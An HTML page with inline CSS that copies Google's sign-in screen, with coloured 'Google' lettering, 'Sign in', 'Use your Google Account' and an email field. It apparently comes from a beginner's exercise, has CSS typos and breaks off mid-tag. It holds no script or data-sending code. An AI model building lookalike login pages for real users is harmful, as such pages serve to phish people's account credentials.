<html>
<head>
<style>
body{
   background-color:white;
   font-family:none;
   text-align;
}
form
{
      background-color:white;
      max-width:500px;
      border:1px solid;
      margin:50px auto;
      padding:30px 20px;
}
.form-control label
{
 display:block;
margin-bottom:10px;
}
 button
    {
      background-color:blue;
      font-size:20px;
      color:white;
      text-align:right;
    }
.form-control input,
.form-control select,
.form-control text
{
 border:1px solidblack;
 paddding:8px;
display:inline-block;
width:95%;
}
.button
{
display:inline;
}
</style><title></title>
</head>
<body>
<form>
<h1 align="center"><font color="blue">G</font>
<font color="red">o</font>
<font color="yellow">o</font>
<font color="blue">g</font>
<font color="green">l</font>
<font color="red">e</font>
<center><h1>Sign in<br></h1></center>
<div align="center">Use your Google Account</div>
<br><div class="form-control">
<input type="text"placeholder="Email or phone"value="Next"/>
<br>
<font color="blue"sized=10><label>Forgot email?</label></font><br><br>
<div align